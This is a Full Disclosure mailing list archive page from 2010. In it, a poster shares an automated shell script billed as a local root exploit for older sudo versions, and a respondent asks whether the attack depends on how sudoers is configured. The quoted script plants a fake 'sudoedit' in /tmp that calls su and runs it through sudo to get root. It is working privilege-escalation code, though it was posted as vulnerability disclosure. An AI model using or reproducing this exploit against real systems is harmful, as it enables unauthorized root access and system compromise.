|
Full Disclosure
mailing list archives
Re: Todd Miller Sudo local root exploit discovered by Slouching
From: Kingcope <kcope2 () googlemail com>
Date: Wed, 03 Mar 2010 14:18:23 +0100
Hello Andy,
I am referring to the following forum posts.
http://www.linuxquestions.org/questions/linux-security-4/the-use-of-sudoedit-command-question-785442/
/kcope
Am Mittwoch, den 03.03.2010, 12:03 +0000 schrieb andy () hotmail com:
Hi Kingcope,
....but if the 'sudoers' file is correctly configured then you would not
have the appropriate sudo permission to run the 'sudoedit' as root.
....of course I'm assuming that the 'sudoers' file has not got the 'run
any command' in it.
If the sudoers file used is even the default then I would think you would
get some error on the lines of:
'Sorry, user is not allowed to execute './sudoedit test' as root on this
machine'.
Aren't you assuming the the sudoers file has a line in it that allows the
user in question to run the /home/myhome/sudoedit as sudo???
Or am I missing something?
Andy
On Tue, 2 Mar 2010, Kingcope wrote:
Just for the record.
---snip---
#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1
--snip---
cheers,
kingcope
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
| 
